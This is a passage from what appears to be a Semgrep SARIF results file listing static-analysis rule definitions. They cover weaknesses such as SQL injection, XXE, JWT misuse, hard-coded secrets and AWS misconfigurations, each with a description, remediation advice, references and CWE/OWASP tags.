Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.aws-lambda.security.sequel-sqli.sequel-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure that actions that can result in privilege escalation are not used. These actions could potentially result in an attacker gaining full administrator access of an AWS account. Try not to use these actions."},"help":{"markdown":"Ensure that actions that can result in privilege escalation are not used. These actions could potentially result in an attacker gaining full administrator access of an AWS account. Try not to use these actions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs)\n - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)\n - [https://cloudsplaining.readthedocs.io/en/latest/glossary/privilege-escalation/](https://cloudsplaining.readthedocs.io/en/latest/glossary/privilege-escalation/)\n","text":"Ensure that actions that can result in privilege escalation are not used. These actions could potentially result in an attacker gaining full administrator access of an AWS account. Try not to use these actions."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs","id":"terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs","name":"terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs","properties":{"precision":"very-high","tags":["CWE-250: Execution with Unnecessary Privileges","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"help":{"markdown":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials)\n - [https://cwe.mitre.org/data/definitions/522.html](https://cwe.mitre.org/data/definitions/522.html)\n","text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"helpUri":"https://semgrep.dev/r/python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials","id":"python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials","name":"python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected wildcard access granted in your ECR repository policy principal. This grants access to all users, including anonymous users (public access). Instead, limit principals, actions and resources to what you need according to least privilege."},"help":{"markdown":"Detected wildcard access granted in your ECR repository policy principal. This grants access to all users, including anonymous users (public access). Instead, limit principals, actions and resources to what you need according to least privilege.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ecr_repository_policy](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ecr_repository_policy)\n - [https://docs.aws.amazon.com/lambda/latest/operatorguide/wildcard-permissions-iam.html](https://docs.aws.amazon.com/lambda/latest/operatorguide/wildcard-permissions-iam.html)\n - [https://docs.aws.amazon.com/prescriptive-guidance/latest/patterns/monitor-amazon-ecr-repositories-for-wildcard-permissions-using-aws-cloudformation-and-aws-config.html](https://docs.aws.amazon.com/prescriptive-guidance/latest/patterns/monitor-amazon-ecr-repositories-for-wildcard-permissions-using-aws-cloudformation-and-aws-config.html)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected wildcard access granted in your ECR repository policy principal. This grants access to all users, including anonymous users (public access). Instead, limit principals, actions and resources to what you need according to least privilege."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal","id":"terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal","name":"terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This gets data from session using user inputs. A malicious user may be able to retrieve information from your session that you didn't intend them to. Do not use user input as a session key."},"help":{"markdown":"## Remediation\nSession manipulation can occur when an application allows user-input in session keys. Since sessions are typically considered a source of truth (e.g. to check the logged-in user or to match CSRF tokens), allowing an attacker to manipulate the session may lead to unintended behavior.\n\n## References\n[Session Manipulation](https://brakemanscanner.org/docs/warning_types/session_manipulation/)\n\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation)\n - [https://brakemanscanner.org/docs/warning_types/session_manipulation/](https://brakemanscanner.org/docs/warning_types/session_manipulation/)\n","text":"## Remediation\nSession manipulation can occur when an application allows user-input in session keys. Since sessions are typically considered a source of truth (e.g. to check the logged-in user or to match CSRF tokens), allowing an attacker to manipulate the session may lead to unintended behavior.\n\n## References\n[Session Manipulation](https://brakemanscanner.org/docs/warning_types/session_manipulation/)\n"},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation","id":"ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation","name":"ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Allowing an attacker to manipulate the session may lead to unintended behavior."}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Allowing user input to `send_file` allows a malicious user to potentially read arbitrary files from the server. Avoid accepting user input in `send_file` or normalize with `File.basename(...)`"},"help":{"markdown":"Allowing user input to `send_file` allows a malicious user to potentially read arbitrary files from the server. Avoid accepting user input in `send_file` or normalize with `File.basename(...)`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-send-file.check-send-file)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control/](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)\n","text":"Allowing user input to `send_file` allows a malicious user to potentially read arbitrary files from the server. Avoid accepting user input in `send_file` or normalize with `File.basename(...)`"},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-send-file.check-send-file","id":"ruby.rails.security.brakeman.check-send-file.check-send-file","name":"ruby.rails.security.brakeman.check-send-file.check-send-file","properties":{"precision":"very-high","tags":["CWE-73: External Control of File Name or Path","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-send-file.check-send-file"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string","id":"python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string","name":"python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application's App Transport Security (ATS) configuration allows for insecure accessing of HTTP content in WebViews. This means that connections accessed in a WebView may be accessed via HTTP, potentially leaking that data to others on the local network, or to other network devices the network traffic traverses (proxies, firewalls, load balancers, etc)."},"help":{"markdown":"The application's App Transport Security (ATS) configuration allows for insecure accessing of HTTP content in WebViews. This means that connections accessed in a WebView may be accessed via HTTP, potentially leaking that data to others on the local network, or to other network devices the network traffic traverses (proxies, firewalls, load balancers, etc).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication)\n","text":"The application's App Transport Security (ATS) configuration allows for insecure accessing of HTTP content in WebViews. This means that connections accessed in a WebView may be accessed via HTTP, potentially leaking that data to others on the local network, or to other network devices the network traffic traverses (proxies, firewalls, load balancers, etc)."},"helpUri":"https://semgrep.dev/r/swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads","id":"swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads","name":"swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"help":{"markdown":"Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection)\n - [https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements](https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements)\n","text":"Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"helpUri":"https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection","id":"javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection","name":"javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"transferFrom() can steal allowance of other accounts"},"help":{"markdown":"transferFrom() can steal allowance of other accounts\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug)\n - [https://medium.com/immunefi/redacted-cartel-custom-approval-logic-bugfix-review-9b2d039ca2c5](https://medium.com/immunefi/redacted-cartel-custom-approval-logic-bugfix-review-9b2d039ca2c5)\n - [https://etherscan.io/address/0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C](https://etherscan.io/address/0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C)\n","text":"transferFrom() can steal allowance of other accounts"},"helpUri":"https://semgrep.dev/r/solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug","id":"solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug","name":"solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug","properties":{"precision":"very-high","tags":["CWE-688: Function Call With Incorrect Variable or Reference as Argument","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure FSX Lustre file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure FSX Lustre file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Ensure FSX Lustre file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk","id":"terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk","name":"terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure AWS Redshift cluster is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure AWS Redshift cluster is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Ensure AWS Redshift cluster is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk","id":"terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk","name":"terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"help":{"markdown":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"helpUri":"https://semgrep.dev/r/javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg","id":"javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg","name":"javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected subprocess function '$LOOP.subprocess_exec' with argument tainted by `event` object. If this data can be controlled by a malicious actor, it may be an instance of command injection. Audit the use of this call to ensure it is not controllable by an external resource. You may consider using 'shlex.escape()'."},"help":{"markdown":"Detected subprocess function '$LOOP.subprocess_exec' with argument tainted by `event` object. If this data can be controlled by a malicious actor, it may be an instance of command injection. Audit the use of this call to ensure it is not controllable by an external resource. You may consider using 'shlex.escape()'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec)\n - [https://docs.python.org/3/library/asyncio-eventloop.html#asyncio.loop.subprocess_exec](https://docs.python.org/3/library/asyncio-eventloop.html#asyncio.loop.subprocess_exec)\n - [https://docs.python.org/3/library/shlex.html](https://docs.python.org/3/library/shlex.html)\n","text":"Detected subprocess function '$LOOP.subprocess_exec' with argument tainted by `event` object. If this data can be controlled by a malicious actor, it may be an instance of command injection. Audit the use of this call to ensure it is not controllable by an external resource. You may consider using 'shlex.escape()'."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec","id":"python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec","name":"python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Set \"rejectUnauthorized\" to false is a convenient way to resolve certificate error. But this method is unsafe because it disables the server certificate verification, making the Node app open to MITM attack. \"rejectUnauthorized\" option must be alway set to True (default value). With self -signed certificate or custom CA, use \"ca\" option to define Root Certificate. This rule checks TLS configuration only for Postgresql, MariaDB and MySQL. SQLite is not really concerned by TLS configuration. This rule could be extended for MSSQL, but the dialectOptions is specific for Tedious."},"help":{"markdown":"Set \"rejectUnauthorized\" to false is a convenient way to resolve certificate error. But this method is unsafe because it disables the server certificate verification, making the Node app open to MITM attack. \"rejectUnauthorized\" option must be alway set to True (default value). With self -signed certificate or custom CA, use \"ca\" option to define Root Certificate. This rule checks TLS configuration only for Postgresql, MariaDB and MySQL. SQLite is not really concerned by TLS configuration. This rule could be extended for MSSQL, but the dialectOptions is specific for Tedious.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation)\n - [https://node-postgres.com/features/ssl](https://node-postgres.com/features/ssl)\n - [https://nodejs.org/api/tls.html#tls_class_tls_tlssocket](https://nodejs.org/api/tls.html#tls_class_tls_tlssocket)\n - [https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options](https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options)\n","text":"Set \"rejectUnauthorized\" to false is a convenient way to resolve certificate error. But this method is unsafe because it disables the server certificate verification, making the Node app open to MITM attack. \"rejectUnauthorized\" option must be alway set to True (default value). With self -signed certificate or custom CA, use \"ca\" option to define Root Certificate. This rule checks TLS configuration only for Postgresql, MariaDB and MySQL. SQLite is not really concerned by TLS configuration. This rule could be extended for MSSQL, but the dialectOptions is specific for Tedious."},"helpUri":"https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation","id":"javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation","name":"javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities","id":"kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities","name":"kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `cursor.execute('SELECT * FROM projects WHERE status = %s', 'active')`"},"help":{"markdown":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `cursor.execute('SELECT * FROM projects WHERE status = %s', 'active')`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.security.pymssql-sqli.pymssql-sqli)\n - [https://pypi.org/project/pymssql/](https://pypi.org/project/pymssql/)\n","text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `cursor.execute('SELECT * FROM projects WHERE status = %s', 'active')`"},"helpUri":"https://semgrep.dev/r/python.aws-lambda.security.pymssql-sqli.pymssql-sqli","id":"python.aws-lambda.security.pymssql-sqli.pymssql-sqli","name":"python.aws-lambda.security.pymssql-sqli.pymssql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.security.pymssql-sqli.pymssql-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a possible YAML deserialization vulnerability. `yaml.unsafe_load`, `yaml.Loader`, `yaml.CLoader`, and `yaml.UnsafeLoader` are all known to be unsafe methods of deserializing YAML. An attacker with control over the YAML input could create special YAML input that allows the attacker to run arbitrary Python code. This would allow the attacker to 